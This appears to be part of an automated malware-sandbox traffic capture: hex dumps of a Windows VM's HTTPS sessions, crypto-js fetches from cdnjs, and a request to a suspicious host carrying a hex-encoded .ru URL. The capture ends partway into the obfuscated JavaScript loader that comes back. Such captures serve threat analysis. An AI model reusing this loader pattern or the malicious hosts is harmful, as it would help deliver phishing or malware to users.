                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-02-19 19:40:03 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 78 30 55 58 6d 4c 55 58 30 30 69 72 6a 70 2f 48 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 31 35 61 38 63 35 37 33 36 34 39 36 39 33 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 6a 51 74 59 51 6a 2b 67 70 34 59 2b 33 49 73 47 32 79 38 30 46 64 58 2b 39 6e 72 61 54 36 57 57 30 64 69 57 65 79 31 7a 34 32 6d 49 34 72 5a 2b 6a 4a 54 2b 31 59 70 58 33 48 41 4a 72 32 47 30 54 69 2b 45 33 49 46 72 44 4f 61 75 5a 77 45 5a 56 77 4c 65 79 31 55 33 67 6b 76 59 4c 39 35 52 48 72 49 74 4b 56 35 78 2f 6f 6d
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: x0UXmLUX00irjp/H.2Context: 815a8c5736496936<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCjQtYQj+gp4Y+3IsG2y80FdX+9nraT6WW0diWey1z42mI4rZ+jJT+1YpX3HAJr2G0Ti+E3IFrDOauZwEZVwLey1U3gkvYL95RHrItKV5x/om
                                    2025-02-19 19:40:03 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 78 30 55 58 6d 4c 55 58 30 30 69 72 6a 70 2f 48 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 31 35 61 38 63 35 37 33 36 34 39 36 39 33 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: x0UXmLUX00irjp/H.3Context: 815a8c5736496936<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-02-19 19:40:03 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-02-19 19:40:03 UTC58INData Raw: 4d 53 2d 43 56 3a 20 72 6b 6d 63 4e 50 39 50 79 30 2b 62 50 66 72 76 43 72 35 76 41 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: rkmcNP9Py0+bPfrvCr5vAA.0Payload parsing failed.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.649718104.17.24.144431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:03 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                    Host: cdnjs.cloudflare.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-02-19 19:40:03 UTC956INHTTP/1.1 200 OK
                                    Date: Wed, 19 Feb 2025 19:40:03 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Access-Control-Allow-Origin: *
                                    Cache-Control: public, max-age=30672000
                                    ETag: W/"5eb03e2d-bb78"
                                    Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                    cf-cdnjs-via: cfworker/kv
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Timing-Allow-Origin: *
                                    X-Content-Type-Options: nosniff
                                    CF-Cache-Status: HIT
                                    Age: 517530
                                    Expires: Mon, 09 Feb 2026 19:40:03 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HH6pSwAACdI0LGn0%2BaxdpLcyY79YnMapoCO2J7T8EKmVFLvC4Bu5d4KCC%2FZh3q0s57lEaIF5yAMA5I2zcFsJSSlAPOoG3BHua1NRAoLEeAZlyKKGcvXgHus1VIF9YLUVhHg0nLlT"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                    Strict-Transport-Security: max-age=15780000
                                    Server: cloudflare
                                    CF-RAY: 9148b9fc5d3f42ce-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2025-02-19 19:40:03 UTC413INData Raw: 37 62 66 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                    Data Ascii: 7bf5!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                    2025-02-19 19:40:03 UTC1369INData Raw: 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e
                                    Data Ascii: ndow.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.
                                    2025-02-19 19:40:03 UTC1369INData Raw: 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e
                                    Data Ascii: <n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function
                                    2025-02-19 19:40:03 UTC1369INData Raw: 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42
                                    Data Ascii: ,this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessB
                                    2025-02-19 19:40:03 UTC1369INData Raw: 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30
                                    Data Ascii: ?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0
                                    2025-02-19 19:40:03 UTC1369INData Raw: 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28
                                    Data Ascii: ]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((
                                    2025-02-19 19:40:03 UTC1369INData Raw: 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36
                                    Data Ascii: *2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296
                                    2025-02-19 19:40:03 UTC1369INData Raw: 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43
                                    Data Ascii: m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C
                                    2025-02-19 19:40:03 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63
                                    Data Ascii: call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c
                                    2025-02-19 19:40:03 UTC1369INData Raw: 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42
                                    Data Ascii: tion(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.649719103.83.194.54431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:04 UTC417OUTGET /.res444.php?2-68747470733a2f2f69322e696374616371756973742e72752f766d3978472f-NfnOSY HTTP/1.1
                                    Host: fascia.fit
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-02-19 19:40:04 UTC196INHTTP/1.1 200 OK
                                    Date: Wed, 19 Feb 2025 19:40:04 GMT
                                    Server: Apache
                                    Access-Control-Allow-Origin: *
                                    Connection: close
                                    Transfer-Encoding: chunked
                                    Content-Type: text/javascript;charset=UTF-8
                                    2025-02-19 19:40:04 UTC1964INData Raw: 37 61 30 0d 0a 20 20 20 20 76 61 72 20 69 51 57 62 53 76 57 74 4a 55 44 49 59 6e 55 7a 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 69 51 57 62 53 76 57 74 4a 55 44 49 59 6e 55 7a 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 69 51 57 62 53 76 57 74 4a 55 44 49 59 6e 55 7a 29 3b 0d 0a 69 51 57 62 53 76 57 74 4a 55 44 49 59 6e 55 7a 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                    Data Ascii: 7a0 var iQWbSvWtJUDIYnUz = document.createElement("script");iQWbSvWtJUDIYnUz.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(iQWbSvWtJUDIYnUz);iQWbSvWtJUDIYnUz.onload=function()


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.649720104.17.24.144431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:04 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                    Host: cdnjs.cloudflare.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-02-19 19:40:04 UTC960INHTTP/1.1 200 OK
                                    Date: Wed, 19 Feb 2025 19:40:04 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Access-Control-Allow-Origin: *
                                    Cache-Control: public, max-age=30672000
                                    ETag: W/"5eb03e2d-bb78"
                                    Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                    cf-cdnjs-via: cfworker/kv
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Timing-Allow-Origin: *
                                    X-Content-Type-Options: nosniff
                                    CF-Cache-Status: HIT
                                    Age: 517531
                                    Expires: Mon, 09 Feb 2026 19:40:04 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8YHIJuiO0FoQGVa2hZDsfAj%2BDfwxFYeavBkM9ZEGDfYUcYiBTeN0C9p%2BfB2DmzuRUTi9cLR4e%2FedQCeCvN5Urny8ejczu5oGx2a%2FAQF7zAGKBL33Bz6N3BzMM78Vu7jo2DNEGz8a"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                    Strict-Transport-Security: max-age=15780000
                                    Server: cloudflare
                                    CF-RAY: 9148ba01ec947ca6-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2025-02-19 19:40:04 UTC409INData Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                    Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
